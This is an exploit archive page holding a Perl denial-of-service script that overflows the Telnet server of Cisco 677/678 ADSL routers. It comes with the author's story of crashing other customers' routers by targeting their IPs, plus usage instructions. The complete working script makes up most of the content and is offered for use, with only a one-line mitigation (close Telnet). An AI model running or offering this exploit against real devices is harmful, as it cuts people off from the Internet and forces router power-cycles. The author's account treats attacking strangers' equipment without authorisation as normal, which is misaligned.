what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cisco677.pl

cisco677.pl
Posted May 5, 2002
Authored by DNV | Site mail.dhbit.ca

Cisco 677/678 Telnet Overflow denial of service perl exploit.

tags | exploit, denial of service, overflow, perl
systems | cisco
SHA-256 | cb4e9ab3984d7182248fb779619975b9ac913a2df54b7cecd9ca0a65b3f66fe9

cisco677.pl

Change Mirror Download

Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
put public on www.deadmeat.dk on 5-5-2002.
Thanks to all from DKW-stuff for testing.

A warm night i was coding and lisen to some tecno music trying to
overflow my BSD mashine.
But then I put the wrong IP into my scrip my ADSL router lost the
Internet connection.
So I start wonder why? and start looking into the code...
I found out that i have overflowed the telnet server
in my adsl router. After that I got online and start chatting
with others with same ISP and same Cisco ADSL-router...
and there route died too then i use there IP.
So I send the code to a friend and ask him to do the same...
On every router with the Telnet server open the router's
ping time got really high
and some of them died and have to be powercycle.
Please note: So fare cisco and the ISP have not done anything
about this problem...

To test it: try with the LAN_IP and WAN_IP it works best on LAN_IP side ;)
the protection is: close your Telnet server in the router.
Thats All!

-DNV Email: dnv[at]dhbit.ca

Here is the code:
running:
perl cisco677.pl -s [IP on Ciscorouter]

--------------------cisco677.pl------------------
#!/usr/bin/perl

# close your Cisco 677 up on the Telnet server!
# Made for fun only! port 23 is the Telnet server port on the router
# By DNV THX to DKW-stuff
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}
------------------------------------------------------


------------------------------------------------
This mail sent from DHBiT - http://mail.dhbit.ca
Come get your free, secure 5MB mailbox today!
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close